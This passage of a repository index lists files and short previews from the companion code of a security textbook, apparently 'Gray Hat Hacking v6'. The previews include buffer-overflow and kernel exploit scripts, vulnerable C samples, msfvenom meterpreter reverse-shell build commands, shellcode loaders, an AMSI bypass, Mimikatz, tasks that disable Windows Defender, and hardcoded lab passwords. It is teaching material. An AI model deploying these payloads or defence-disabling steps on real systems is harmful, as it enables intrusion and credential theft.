"preview": "#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\nint main() {\n\tchar *ghh = malloc(30);\n\tstrncpy(ghh, \"Gray Hat"
},
{
"path": "ch03/leak-bof-exploit.py",
"chars": 1012,
"preview": "#!/usr/bin/env python3\n\nfrom pwn import *\ncontext.update(arch='amd64', os='linux')\n\nelf = ELF(\"./leak-bof\")\nlibc = ELF(\""
},
{
"path": "ch03/leak-bof.c",
"chars": 281,
"preview": "// leak-bof.c\n#include <stdio.h>\n#include <unistd.h>\n\nvoid vuln() {\n char buff[128];\n printf(\"Overflows with 128 b"
},
{
"path": "ch04/students-patched.c",
"chars": 2456,
"preview": "// students.c\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n\ntypedef struct {\n char name[24];\n int id"
},
{
"path": "ch04/students.c",
"chars": 2520,
"preview": "// students.c\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n\ntypedef struct {\n char name[24];\n int id"
},
{
"path": "ch04/students.csv",
"chars": 59,
"preview": "Jordan,84\nMilley,91\nDebbie,65\nJoseph,60\nXuang,98\nTamara,88\n"
},
{
"path": "ch05/myAtoi.c",
"chars": 293,
"preview": "#include <stdio.h>\n#include <stdlib.h>\n\nint myAtoi(char *str){\n int res = 0;\n for (int i = 0; str[i] != '\\0'; ++i)"
},
{
"path": "ch05/myProg.c",
"chars": 346,
"preview": "#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n\nint func1(char* input)\n{\n\n\tchar string1[60];\n\n\tstrcpy(string"
},
{
"path": "ch07/Lab/ansible/ansible.cfg",
"chars": 66,
"preview": "[defaults]\nhost_key_checking = False\nenable_task_debugger = True\n\n"
},
{
"path": "ch07/Lab/ansible/ch07_playbook.yml",
"chars": 456,
"preview": "---\n- hosts: dc\n roles:\n - common\n - windows_dns_server\n - windows_domain_controller\n - windows_domain_user"
},
{
"path": "ch07/Lab/ansible/roles/common/defaults/main.yml",
"chars": 5,
"preview": "---\n\n"
},
{
"path": "ch07/Lab/ansible/roles/common/handlers/main.yml",
"chars": 4,
"preview": "---\n"
},
{
"path": "ch07/Lab/ansible/roles/common/meta/main.yml",
"chars": 308,
"preview": "---\ngalaxy_info:\n role_name: install_misc_software\n author: Russ Nolen rnolen@splunk.com\n description: Install some b"
},
{
"path": "ch07/Lab/ansible/roles/common/tasks/chocolatey-components.yml",
"chars": 366,
"preview": "---\n- name: Install Chocolately via Powershell\n win_shell: \"Set-ExecutionPolicy Bypass -Scope Process -Force; [System.N"
},
{
"path": "ch07/Lab/ansible/roles/common/tasks/main.yml",
"chars": 284,
"preview": "---\n# need to wrap an if statement around this one\n# make it windows specific\n- name : Disable Windows Firewall\n win_fi"
},
{
"path": "ch07/Lab/ansible/roles/common/tasks/windows-components.yml",
"chars": 280,
"preview": "---\n- name: Install the Visual C++ Redistributable\n win_package:\n path: \"https://download.microsoft.com/download/9/3"
},
{
"path": "ch07/Lab/ansible/roles/common/tasks/windows-disable-defender.yml",
"chars": 210,
"preview": "---\n\n- name: Disable Windows Defender\n win_regedit:\n key: \"HKLM:\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\R"
},
{
"path": "ch07/Lab/ansible/roles/kali_customizations/files/addshare.txt",
"chars": 141,
"preview": "[ghh]\n comment = GHH Share\n browseable = yes\n path = /tmp\n printable = no\n guest ok = yes\n read only = yes\n "
},
{
"path": "ch07/Lab/ansible/roles/kali_customizations/files/covenant.patch",
"chars": 296,
"preview": "--- /usr/share/kaboxer/covenant.kaboxer.orig\t2021-09-12 19:28:35.392506176 +0000\n+++ /usr/share/kaboxer/covenant.kaboxer"
},
{
"path": "ch07/Lab/ansible/roles/kali_customizations/files/shells/build_csharp.sh",
"chars": 469,
"preview": "#!/bin/bash\n\nSC=`msfvenom -p windows/x64/meterpreter_reverse_tcp -f csharp --platform windows --arch x64 LHOST=10.0.0.4"
},
{
"path": "ch07/Lab/ansible/roles/kali_customizations/files/shells/build_go.sh",
"chars": 330,
"preview": "#!/bin/bash\n\nSC=`msfvenom -p windows/x64/meterpreter_reverse_tcp -f base64 --platform windows --arch x64 LHOST=10.0.0.4"
},
{
"path": "ch07/Lab/ansible/roles/kali_customizations/files/shells/build_nim.sh",
"chars": 542,
"preview": "#!/bin/bash\n\nSC=`msfvenom -p windows/x64/meterpreter_reverse_tcp -f csharp --platform windows --arch x64 LHOST=10.0.0.4"
},
{
"path": "ch07/Lab/ansible/roles/kali_customizations/files/shells/csharp.template",
"chars": 1559,
"preview": "using System;\nusing System.Runtime.InteropServices;\n\n\nnamespace GHHSCLauncher\n{\n class Program\n {\n private "
},
{
"path": "ch07/Lab/ansible/roles/kali_customizations/files/shells/execute.template",
"chars": 2294,
"preview": "import winim/lean\nimport strformat\nimport dynlib\nimport osproc\n\nconst patch: array[1, byte] = [byte 0xc3]\n\nproc Patchntd"
},
{
"path": "ch07/Lab/ansible/roles/kali_customizations/files/shells/go.mod",
"chars": 104,
"preview": "module createFiber.go\n\ngo 1.15\n\nrequire golang.org/x/sys v0.0.0-20210923061019-b8560ed6a9b7 // indirect\n"
},
{
"path": "ch07/Lab/ansible/roles/kali_customizations/files/shells/go.sum",
"chars": 207,
"preview": "golang.org/x/sys v0.0.0-20210923061019-b8560ed6a9b7 h1:c20P3CcPbopVp2f7099WLOqSNKURf30Z0uq66HpijZY=\ngolang.org/x/sys v0."
},
{
"path": "ch07/Lab/ansible/roles/kali_customizations/files/shells/go.template",
"chars": 2454,
"preview": "// Inspired by ired.team and Ne0nd0g's go-shellcode repository\n// Reference: https://github.com/Ne0nd0g/go-shellcode\n// "
},
{
"path": "ch07/Lab/ansible/roles/kali_customizations/files/shells/nim.template",
"chars": 2816,
"preview": "# Adapted from Byt3bl33der's ETW code.\nimport winim/lean\nimport strformat\nimport dynlib\nimport osproc\n\n# 0xc3 = RET in a"
},
{
"path": "ch07/Lab/ansible/roles/kali_customizations/tasks/main.yml",
"chars": 1777,
"preview": "---\n- name: Make python3 default\n alternatives:\n name: python\n path: /usr/bin/python3\n link: /usr/bin/pyth"
},
{
"path": "ch07/Lab/ansible/roles/target_customizations/tasks/main.yml",
"chars": 3006,
"preview": "---\n- name: Update Local Security Policy to allow users to run scheduled tasks\n win_user_right:\n name: SeBatchLogonR"
},
{
"path": "ch07/Lab/ansible/roles/windows_client_join_domain/tasks/main.yml",
"chars": 654,
"preview": "---\n- name: Gather facts from new server\n setup:\n filter: ansible_default_ipv4.address\n \n- name: setu"
},
{
"path": "ch07/Lab/ansible/roles/windows_dns_server/defaults/main.yml",
"chars": 0,
"preview": ""
},
{
"path": "ch07/Lab/ansible/roles/windows_dns_server/handlers/main.yml",
"chars": 38,
"preview": "- name: restart machine\n win_reboot:\n"
},
{
"path": "ch07/Lab/ansible/roles/windows_dns_server/tasks/features.yml",
"chars": 197,
"preview": "---\n- name: features | Installing Windows DNS Server\n win_feature:\n name: DNS\n state: present\n include_managem"
},
{
"path": "ch07/Lab/ansible/roles/windows_dns_server/tasks/main.yaml",
"chars": 47,
"preview": "- include: features.yml\n- include: reboot.yml \n"
},
{
"path": "ch07/Lab/ansible/roles/windows_dns_server/tasks/reboot.yml",
"chars": 190,
"preview": "---\n- name: reboot | Rebooting Server\n win_reboot:\n reboot_timeout_sec: 3600\n when: >\n _windows_dns_server['rest"
},
{
"path": "ch07/Lab/ansible/roles/windows_domain_controller/defaults/main.yml",
"chars": 0,
"preview": ""
},
{
"path": "ch07/Lab/ansible/roles/windows_domain_controller/handlers/main.yml",
"chars": 38,
"preview": "- name: restart machine\n win_reboot:\n"
},
{
"path": "ch07/Lab/ansible/roles/windows_domain_controller/tasks/create.yml",
"chars": 1445,
"preview": "---\n# tasks file for ansible-windows-domain-controller\n#\n\n\n- name: set local admin password\n win_user:\n name: Admini"
},
{
"path": "ch07/Lab/ansible/roles/windows_domain_controller/tasks/main.yaml",
"chars": 45,
"preview": "- include: create.yml\n- include: reboot.yml \n"
},
{
"path": "ch07/Lab/ansible/roles/windows_domain_controller/tasks/reboot.yml",
"chars": 245,
"preview": "---\n- name: reboot | Rebooting Server\n win_reboot:\n reboot_timeout_sec: 3600\n shutdown_timeout_sec: 3600\n when: "
},
{
"path": "ch07/Lab/ansible/roles/windows_domain_users_groups/files/usermods.ps1",
"chars": 3214,
"preview": " Import-Module ActiveDirectory\n#Bring up an Active Directory command prompt so we can use this later on in the script\n#G"
},
{
"path": "ch07/Lab/ansible/roles/windows_domain_users_groups/tasks/main.yml",
"chars": 1195,
"preview": "---\n- name: Disable domain password complexity\n win_shell: 'Get-ADDefaultDomainPasswordPolicy -Current LoggedOnUser | S"
},
{
"path": "ch07/Lab/ansible/roles/windows_local_group_membership/tasks/main.yml",
"chars": 193,
"preview": "---\n- name: add users to local groups for remote login\n win_group_membership:\n name: \"Remote Desktop Users\"\n "
},
{
"path": "ch07/Lab/ansible/vars/users.yml",
"chars": 333,
"preview": "---\n#domain_users:\n#- { name : \"target\", password : \"Winter2021\" , groups : \"\" }\n#- { name : \"ghhadmin\" , password : \"Gr"
},
{
"path": "ch07/Lab/ansible/vars/vars.yml",
"chars": 234,
"preview": "windows_domain_controller_info:\n dns_domain_name: ghh.local\n domain_admin_password: GrayHatHack1ng!\n domain_admin_"
},
{
"path": "ch07/Lab/build.sh",
"chars": 145,
"preview": "#!/bin/bash\n\ncd terraform \nterraform init && terraform validate && terraform apply\ncd ../ansible\nansible-playbook -i inv"
},
{
"path": "ch07/Lab/destroy.sh",
"chars": 43,
"preview": "#!/bin/bash\ncd terraform\nterraform destroy\n"
},
{
"path": "ch07/Lab/terraform/aws_data.tf",
"chars": 706,
"preview": "data \"aws_availability_zones\" \"this\" {\n state = \"available\"\n}\n\ndata \"aws_ami\" \"ghh-kali\" {\n most_recent = true\n\n filt"
},
{
"path": "ch07/Lab/terraform/aws_hosts.tf",
"chars": 1527,
"preview": "\nlocals {\n dc-userdata = <<EOF\n<powershell>\n $admin = [adsi](\"WinNT://./administrator, user\")\n $admin.psbase.invoke(\""
},
{
"path": "ch07/Lab/terraform/inventory.tmpl",
"chars": 124,
"preview": "${cat}:\n hosts:\n%{for addr in ip_addrs ~}\n ${addr}:\n%{endfor ~}\n vars:\n%{for var in vars ~}\n ${var}\n%{endfor"
},
{
"path": "ch07/Lab/terraform/main.tf",
"chars": 150,
"preview": "provider \"aws\" {\n shared_credentials_file = var.shared_credentials_file\n region = \"us-east-1\"\n profi"
},
{
"path": "ch07/Lab/terraform/outputs.tf",
"chars": 1703,
"preview": "output \"dc_password\" { value = rsadecrypt(aws_instance.ghh_dc.password_data, file(var.key_path)) }\noutput \"target_pa"
},
{
"path": "ch07/Lab/terraform/terraform.tfvars-orig",
"chars": 34,
"preview": "key_path=\"<path to your SSH KEY>\"\n"
},
{
"path": "ch07/Lab/terraform/variables.tf",
"chars": 676,
"preview": "variable \"aws_region\" {\n default = \"us-east-1\"\n}\nvariable \"aws_profile\" {\n default = \"ghh\"\n}\nvariable \"dc_password\" {\n"
},
{
"path": "ch07/Lab/terraform/versions.tf",
"chars": 0,
"preview": ""
},
{
"path": "ch07/Lab/terraform/vpc.tf",
"chars": 2961,
"preview": "resource \"aws_vpc\" \"this\" {\n\n cidr_block = \"10.0.0.0/16\"\n enable_dns_hostnames = true\n enable_dns_support "
},
{
"path": "ch07/README.md",
"chars": 2625,
"preview": "# Gray Hat Hacking v6 Chapter 07\r\nThis directory contains all the components necessary for Chapter 07.\r\n\r\n## Lab Informa"
},
{
"path": "ch08/winlogbeat.yml",
"chars": 3120,
"preview": "# Example for the Beats on WEF server of DetectionLab\n# Configuration version: 2021-05-31\n# Derived from https://github."
},
{
"path": "ch10/ch10_6_exploit.py",
"chars": 479,
"preview": "#!/usr/bin/env python3\n#ch10_6_exploit.py\nfrom pwn import *\n\ncontext(bits=32, arch='i386')\n\n# Connect to vulnerable ch10"
},
{
"path": "ch10/getenv.c",
"chars": 170,
"preview": "//getenv.c\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n\nint main() {\n printf(\"0x%08x\\n\", (getenv(\"SHEL"
},
{
"path": "ch10/meet.c",
"chars": 658,
"preview": "// meet.c\n#include <stdio.h> // needed for screen printing\n#include <string.h> // needed for strcpy\nvoid "
},
{
"path": "ch10/meet_exploit.py",
"chars": 486,
"preview": "#!/usr/bin/env python3\n#meet_exploit.py\n\nfrom pwn import *\ncontext.update(arch='i386', os='linux')\n\nshellcode = b\"\\x31\\x"
},
{
"path": "ch10/overflow.c",
"chars": 209,
"preview": "//overflow.c\n#include <string.h>\nint main(){\n char str1[10]; //declare a 10 byte string\n //next, copy 35 bytes "
},
{
"path": "ch10/shellcode.c",
"chars": 785,
"preview": "#include <stdio.h>\n#include <sys/mman.h>\n\nconst char shellcode[] = //setuid(0) & Aleph1's famous shellcode, see ref.\n\"\\"
},
{
"path": "ch10/smallbuff.c",
"chars": 176,
"preview": "//smallbuff.c\n#include <string.h>\nint main(int argc, char * argv[]){\n char buff[10]; //small buffer\n strcpy(buff,"
},
{
"path": "ch10/smallbuff_exploit.py",
"chars": 268,
"preview": "#!/usr/bin/env python3\n#smallbuf_exploit.py\n\nfrom pwn import *\n\n#Get SHELLCODE env\nenvp = process(\"./getenv\")\nshellcode_"
},
{
"path": "ch11/README.md",
"chars": 511,
"preview": "The Kali version used at the time of writing was 2020.4 (GCC 10.2.0). Newer Kali/GCC versions breaks the `exploit3.py` a"
},
{
"path": "ch11/exploit1.py",
"chars": 593,
"preview": "from pwn import *\n\n# Lab 11-2: Bypassing Non-executable stack (NX) with Return Oriented Programming (ROP)\n# gcc -no-pie "
},
{
"path": "ch11/exploit2.py",
"chars": 1358,
"preview": "from pwn import *\n\n# Lab 11-3: Defeating Stack Canaries\n# echo 0 | sudo tee /proc/sys/kernel/randomize_va_space\n\ncontext"
},
{
"path": "ch11/exploit3-v2.py",
"chars": 2050,
"preview": "from pwn import *\n\n# Lab 11-4: ASLR bypass with an Information Leak\n# gcc -no-pie -fstack-protector vuln.c -o vuln\n# ech"
},
{
"path": "ch11/exploit3.py",
"chars": 1750,
"preview": "from pwn import *\n\n# Lab 11-4: ASLR bypass with an Information Leak\n# gcc -no-pie -fstack-protector vuln.c -o vuln\n# ech"
},
{
"path": "ch11/exploit4.py",
"chars": 1932,
"preview": "from pwn import *\n\n# Lab 11-5: PIE bypass with an Information Leak\n# gcc -fstack-protector vuln.c -o vuln\n# echo 2 | sud"
},
{
"path": "ch11/vuln.c",
"chars": 2180,
"preview": "#include <stdio.h>\n#include <stdlib.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <unistd.h>\n#include <neti"
},
{
"path": "ch12/run1.sh",
"chars": 340,
"preview": "#!/bin/sh\n\n/usr/bin/qemu-system-x86_64 \\\n\t-m 64 \\\n\t-kernel ./stackprotector-disabled/bzImage \\\n\t-nographic \\\n\t-append \"r"
},
{
"path": "ch12/run2.sh",
"chars": 314,
"preview": "#!/bin/sh\n\n/usr/bin/qemu-system-x86_64 \\\n\t-m 64 \\\n\t-kernel bzImage \\\n\t-nographic \\\n\t-append \"rw console=ttyS0 nokaslr qu"
},
{
"path": "ch12/run3.sh",
"chars": 333,
"preview": "#!/bin/sh\n\n/usr/bin/qemu-system-x86_64 \\\n\t-m 64 \\\n\t-kernel bzImage \\\n\t-nographic \\\n\t-append \"rw console=ttyS0 nokaslr qu"
},
{
"path": "ch12/run4.sh",
"chars": 338,
"preview": "#!/bin/sh\n\n/usr/bin/qemu-system-x86_64 \\\n\t-m 64 \\\n\t-kernel bzImage \\\n\t-nographic \\\n\t-append \"rw console=ttyS0 nokaslr qu"
},
{
"path": "ch12/run5.sh",
"chars": 330,
"preview": "#!/bin/sh\n\n/usr/bin/qemu-system-x86_64 \\\n\t-m 64 \\\n\t-kernel bzImage \\\n\t-nographic \\\n\t-append \"rw console=ttyS0 quiet\" \\\n\t"
},
{
"path": "ch12/shared/.ash_history",
"chars": 0,
"preview": ""
},
{
"path": "ch12/shared/exploit1/exploit.c",
"chars": 1308,
"preview": "\n#define _GNU_SOURCE\n#include <stdio.h>\n#include <fcntl.h>\n#include <unistd.h>\n#include <stdlib.h>\n\nunsigned long user_c"
},
{
"path": "ch12/shared/exploit2/exploit.c",
"chars": 1475,
"preview": "#define _GNU_SOURCE\n#include <stdio.h>\n#include <fcntl.h>\n#include <unistd.h>\n#include <stdlib.h>\n\nunsigned long user_cs"
},
{
"path": "ch12/shared/exploit3/exploit.c",
"chars": 1736,
"preview": "#define _GNU_SOURCE\n#include <stdio.h>\n#include <fcntl.h>\n#include <unistd.h>\n#include <stdlib.h>\n#include <sys/mman.h>\n"
},
{
"path": "ch12/shared/exploit4/exploit.c",
"chars": 2645,
"preview": "#define _GNU_SOURCE\n#include <stdio.h>\n#include <fcntl.h>\n#include <unistd.h>\n#include <stdlib.h>\n#include <sys/mman.h>\n"
},
{
"path": "ch12/shared/exploit5/exploit.c",
"chars": 2771,
"preview": "#define _GNU_SOURCE\n#include <stdio.h>\n#include <fcntl.h>\n#include <unistd.h>\n#include <stdlib.h>\n#include <sys/mman.h>\n"
},
{
"path": "ch12/shared/leak.c",
"chars": 507,
"preview": "#define _GNU_SOURCE\n#include <stdio.h>\n#include <fcntl.h>\n#include <unistd.h>\n#include <stdlib.h>\n\nint main() {\n\n int"
},
{
"path": "ch13/hello.c",
"chars": 59,
"preview": "#include <stdio.h>\r\nmain() {\r\n printf(\"Hello Haxor\");\r\n}"
},
{
"path": "ch13/meet.c",
"chars": 265,
"preview": "#include <stdio.h>\r\ngreeting(char *temp1, char *temp2) {\r\n char name[400];\r\n strcpy(name, temp2);\r\n printf(\"Hel"
},
{
"path": "ch13/prosshd1.py",
"chars": 452,
"preview": "#prosshd3.py POC Exploit\nimport paramiko\nfrom scp import *\nfrom contextlib import closing\nfrom time import sleep\nimport "
},
{
"path": "ch13/prosshd2.py",
"chars": 461,
"preview": "#prosshd3.py POC Exploit\nimport paramiko\nfrom scp import *\nfrom contextlib import closing\nfrom time import sleep\nimport "
},
{
"path": "ch13/prosshd3.py",
"chars": 1607,
"preview": "#prosshd3.py POC Exploit\nimport paramiko\nfrom scp import *\nfrom contextlib import closing\nfrom time import sleep\nimport "
},
{
"path": "ch13/prosshd_dep.py",
"chars": 4158,
"preview": "#prosshd_dep.py\nimport paramiko\nfrom scp import *\nfrom contextlib import closing\nfrom time import sleep\nimport struct\n\nh"
},
{
"path": "ch14/dbutil_exploit/Cargo.toml",
"chars": 283,
"preview": "[package]\nname = \"dbutil\"\nversion = \"0.1.0\"\nedition = \"2018\"\n\n# See more keys and their definitions at https://doc.rust-"
},
{
"path": "ch14/dbutil_exploit/src/bin/exploit.rs",
"chars": 1130,
"preview": "use dbutil::{get_kernel_base, open_dev, read_ptr, write_ptr};\r\nuse winapi::um::libloaderapi::{GetProcAddress, LoadLibrar"
},
{
"path": "ch14/dbutil_exploit/src/bin/ioctlcall.rs",
"chars": 439,
"preview": "use dbutil::{ioctl, open_dev};\r\n\r\nfn main() {\r\n let hdev = unsafe { open_dev() };\r\n let args: Vec<String> = std::e"
},
{
"path": "ch14/dbutil_exploit/src/lib.rs",
"chars": 2090,
"preview": "use std::mem::size_of;\nuse std::ptr::null_mut;\nuse winapi::um::{fileapi::*, ioapiset::*, psapi::*, winnt::*};\n\n#[repr(C)"
},
{
"path": "ch14/dbutil_exploit.c",
"chars": 2946,
"preview": "#include <windows.h>\n#pragma comment(lib, \"psapi.lib\")\n\nconst unsigned long PID_OFFSET = 0x440;\nconst unsigned long APLI"
},
{
"path": "ch14/dbutil_exploit.py",
"chars": 5531,
"preview": "from ctypes import (\n windll,\n LittleEndianStructure,\n POINTER,\n byref,\n cast,\n sizeof,\n c_uint64,\n"
},
{
"path": "ch14/ioctlcall.py",
"chars": 3308,
"preview": "from ctypes import windll, POINTER, byref\nfrom ctypes.wintypes import LPVOID, DWORD, LPCSTR, LPSTR, BOOL, HANDLE\n\n\ngle ="
},
{
"path": "ch15/Lab/ansible/ansible.cfg",
"chars": 38,
"preview": "[defaults]\nhost_key_checking = False\n\n"
},
{
"path": "ch15/Lab/ansible/ch15_playbook.yml",
"chars": 202,
"preview": "---\n- hosts: target\n roles:\n - common\n - target_customizations\n vars_files:\n - vars/vars.yml\n- hosts: kali \n "
},
{
"path": "ch15/Lab/ansible/roles/common/defaults/main.yml",
"chars": 5,
"preview": "---\n\n"
},
{
"path": "ch15/Lab/ansible/roles/common/handlers/main.yml",
"chars": 4,
"preview": "---\n"
},
{
"path": "ch15/Lab/ansible/roles/common/meta/main.yml",
"chars": 308,
"preview": "---\ngalaxy_info:\n role_name: install_misc_software\n author: Russ Nolen rnolen@splunk.com\n description: Install some b"
},
{
"path": "ch15/Lab/ansible/roles/common/tasks/chocolatey-components.yml",
"chars": 366,
"preview": "---\n- name: Install Chocolately via Powershell\n win_shell: \"Set-ExecutionPolicy Bypass -Scope Process -Force; [System.N"
},
{
"path": "ch15/Lab/ansible/roles/common/tasks/main.yml",
"chars": 191,
"preview": "---\n# need to wrap an if statement around this one\n# make it windows specific\n- name : Disable Windows Firewall\n win_fi"
},
{
"path": "ch15/Lab/ansible/roles/common/tasks/windows-components.yml",
"chars": 280,
"preview": "---\n- name: Install the Visual C++ Redistributable\n win_package:\n path: \"https://download.microsoft.com/download/9/3"
},
{
"path": "ch15/Lab/ansible/roles/common/tasks/windows-disable-defender.yml",
"chars": 210,
"preview": "---\n\n- name: Disable Windows Defender\n win_regedit:\n key: \"HKLM:\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\R"
},
{
"path": "ch15/Lab/ansible/roles/kali_customizations/files/Invoke-Mimikatz.ps1",
"chars": 2855418,
"preview": "function Invoke-Mimikatz\n{\n<#\n.SYNOPSIS\n\nThis script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflecti"
},
{
"path": "ch15/Lab/ansible/roles/kali_customizations/files/amsi.ps1",
"chars": 5638,
"preview": "Write-Host \"-- AMSI Patch\"\nWrite-Host \"-- Modified By: Shantanu Khandelwal (@shantanukhande)\"\nWrite-Host \"-- Original Au"
},
{
"path": "ch15/Lab/ansible/roles/kali_customizations/tasks/main.yml",
"chars": 1760,
"preview": "---\n- name: Make python3 default\n alternatives:\n name: python\n path: /usr/bin/python3\n link: /usr/bin/pyth"
},
{
"path": "ch15/Lab/ansible/roles/target_customizations/tasks/main.yml",
"chars": 1169,
"preview": "---\n- name: install dotnet core\n win_feature:\n name: Net-Framework-Core\n state: present\n- name: choco"
},
{
"path": "ch15/Lab/ansible/vars/users.yml",
"chars": 333,
"preview": "---\n#domain_users:\n#- { name : \"target\", password : \"Winter2021\" , groups : \"\" }\n#- { name : \"ghhadmin\" , password : \"Gr"
},
{
"path": "ch15/Lab/ansible/vars/vars.yml",
"chars": 234,
"preview": "windows_domain_controller_info:\n dns_domain_name: ghh.local\n domain_admin_password: GrayHatHack1ng!\n domain_admin_"
},
{
"path": "ch15/Lab/build.sh",
"chars": 145,
"preview": "#!/bin/bash\n\ncd terraform \nterraform init && terraform validate && terraform apply\ncd ../ansible\nansible-playbook -i inv"
},
{
"path": "ch15/Lab/destroy.sh",
"chars": 43,
"preview": "#!/bin/bash\ncd terraform\nterraform destroy\n"
},
{
"path": "ch15/Lab/get-ips.sh",
"chars": 421,
"preview": "#!/bin/bash\nTARGET_IP=`jq -r '.resources[] | select(.name == \"ghh_target\")| .instances[0].attributes.public_ip' terrafor"
},
{
"path": "ch15/Lab/terraform/aws_data.tf",
"chars": 706,
"preview": "data \"aws_availability_zones\" \"this\" {\n state = \"available\"\n}\n\ndata \"aws_ami\" \"ghh-kali\" {\n most_recent = true\n\n filt"
},
{
"path": "ch15/Lab/terraform/aws_hosts.tf",
"chars": 1049,
"preview": "\nlocals {\n dc-userdata = <<EOF\n<powershell>\n $admin = [adsi](\"WinNT://./administrator, user\")\n $admin.psbase.invoke(\""
},
{
"path": "ch15/Lab/terraform/inventory.tmpl",
"chars": 124,
"preview": "${cat}:\n hosts:\n%{for addr in ip_addrs ~}\n ${addr}:\n%{endfor ~}\n vars:\n%{for var in vars ~}\n ${var}\n%{endfor"
},
{
"path": "ch15/Lab/terraform/main.tf",
"chars": 150,
"preview": "provider \"aws\" {\n shared_credentials_file = var.shared_credentials_file\n region = \"us-east-1\"\n profi"
},
{
"path": "ch15/Lab/terraform/outputs.tf",
"chars": 1050,
"preview": "output \"target_password\" { value = rsadecrypt(aws_instance.ghh_target.password_data, file(var.key_path)) }\n\noutput \""
},
{
"path": "ch15/Lab/terraform/terraform.tfvars-orig",
"chars": 34,
"preview": "key_path=\"<path to your SSH KEY>\"\n"
},
{
"path": "ch15/Lab/terraform/variables.tf",
"chars": 676,
"preview": "variable \"aws_region\" {\n default = \"us-east-1\"\n}\nvariable \"aws_profile\" {\n default = \"ghh\"\n}\nvariable \"dc_password\" {\n"
},
{
"path": "ch15/Lab/terraform/versions.tf",
"chars": 0,
"preview": ""
},
{
"path": "ch15/Lab/terraform/vpc.tf",
"chars": 2717,
"preview": "resource \"aws_vpc\" \"this\" {\n\n cidr_block = \"10.0.0.0/16\"\n enable_dns_hostnames = true\n enable_dns_support "
},
{
"path": "ch15/README.md",
"chars": 2300,
"preview": "# Gray Hat Hacking v6 Lab 15\r\nThis directory contains all the components necessary for Lab 15.\r\n\r\n## Lab Information \r\n"
},
{
"path": "ch16/Lab/ansible/ansible.cfg",
"chars": 38,
"preview": "[defaults]\nhost_key_checking = False\n\n"
},
{
"path": "ch16/Lab/ansible/ch16_playbook.yml",
"chars": 560,
"preview": "---\n- hosts: dc\n roles:\n - common\n - windows_dns_server\n - windows_domain_controller\n - windows_domain_user"
},
{
"path": "ch16/Lab/ansible/roles/common/defaults/main.yml",
"chars": 5,
"preview": "---\n\n"
},
{
"path": "ch16/Lab/ansible/roles/common/handlers/main.yml",
"chars": 4,
"preview": "---\n"
},
{
"path": "ch16/Lab/ansible/roles/common/meta/main.yml",
"chars": 308,
"preview": "---\ngalaxy_info:\n role_name: install_misc_software\n author: Russ Nolen rnolen@splunk.com\n description: Install some b"
},
{
"path": "ch16/Lab/ansible/roles/common/tasks/chocolatey-components.yml",
"chars": 366,
"preview": "---\n- name: Install Chocolately via Powershell\n win_shell: \"Set-ExecutionPolicy Bypass -Scope Process -Force; [System.N"
},
{
"path": "ch16/Lab/ansible/roles/common/tasks/main.yml",
"chars": 284,
"preview": "---\n# need to wrap an if statement around this one\n# make it windows specific\n- name : Disable Windows Firewall\n win_fi"
},
{
"path": "ch16/Lab/ansible/roles/common/tasks/windows-components.yml",
"chars": 280,
"preview": "---\n- name: Install the Visual C++ Redistributable\n win_package:\n path: \"https://download.microsoft.com/download/9/3"
},
{
"path": "ch16/Lab/ansible/roles/common/tasks/windows-disable-defender.yml",
"chars": 210,
"preview": "---\n\n- name: Disable Windows Defender\n win_regedit:\n key: \"HKLM:\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\R"
},
{
"path": "ch16/Lab/ansible/roles/kali_customizations/tasks/main.yml",
"chars": 1085,
"preview": "---\n- name: Make python3 default\n alternatives:\n name: python\n path: /usr/bin/python3\n link: /usr/bin/pyth"
},
{
"path": "ch16/Lab/ansible/roles/target_customizations/tasks/main.yml",
"chars": 1197,
"preview": "---\n- name: Update Local Security Policy to allow users to run scheduled tasks\n win_user_right:\n name: SeBatchLogonR"
},
{
"path": "ch16/Lab/ansible/roles/util_customizations/tasks/main.yml",
"chars": 962,
"preview": "---\n- name: install dotnet core\n win_feature:\n name: Net-Framework-Core\n state: present\n- name: choco"
},
{
"path": "ch16/Lab/ansible/roles/windows_client_join_domain/tasks/main.yml",
"chars": 654,
"preview": "---\n- name: Gather facts from new server\n setup:\n filter: ansible_default_ipv4.address\n \n- name: setu"
},
{
"path": "ch16/Lab/ansible/roles/windows_dns_server/defaults/main.yml",
"chars": 0,
"preview": ""
},
{
"path": "ch16/Lab/ansible/roles/windows_dns_server/handlers/main.yml",
"chars": 38,
"preview": "- name: restart machine\n win_reboot:\n"
},
{
"path": "ch16/Lab/ansible/roles/windows_dns_server/tasks/features.yml",
"chars": 197,
"preview": "---\n- name: features | Installing Windows DNS Server\n win_feature:\n name: DNS\n state: present\n include_managem"
},
{
"path": "ch16/Lab/ansible/roles/windows_dns_server/tasks/main.yaml",
"chars": 47,
"preview": "- include: features.yml\n- include: reboot.yml \n"
},
{
"path": "ch16/Lab/ansible/roles/windows_dns_server/tasks/reboot.yml",
"chars": 190,
"preview": "---\n- name: reboot | Rebooting Server\n win_reboot:\n reboot_timeout_sec: 3600\n when: >\n _windows_dns_server['rest"
},
{
"path": "ch16/Lab/ansible/roles/windows_domain_controller/defaults/main.yml",
"chars": 0,
"preview": ""
},
{
"path": "ch16/Lab/ansible/roles/windows_domain_controller/handlers/main.yml",
"chars": 38,
"preview": "- name: restart machine\n win_reboot:\n"
},
{
"path": "ch16/Lab/ansible/roles/windows_domain_controller/tasks/create.yml",
"chars": 1445,
"preview": "---\n# tasks file for ansible-windows-domain-controller\n#\n\n\n- name: set local admin password\n win_user:\n name: Admini"
},
{
"path": "ch16/Lab/ansible/roles/windows_domain_controller/tasks/main.yaml",
"chars": 45,
"preview": "- include: create.yml\n- include: reboot.yml \n"
},
{
"path": "ch16/Lab/ansible/roles/windows_domain_controller/tasks/reboot.yml",
"chars": 245,
"preview": "---\n- name: reboot | Rebooting Server\n win_reboot:\n reboot_timeout_sec: 3600\n shutdown_timeout_sec: 3600\n when: "
},
{
"path": "ch16/Lab/ansible/roles/windows_domain_users_groups/tasks/main.yml",
"chars": 920,
"preview": "---\n- name: Disable domain password complexity\n win_shell: 'Get-ADDefaultDomainPasswordPolicy -Current LoggedOnUser | S"
},
{
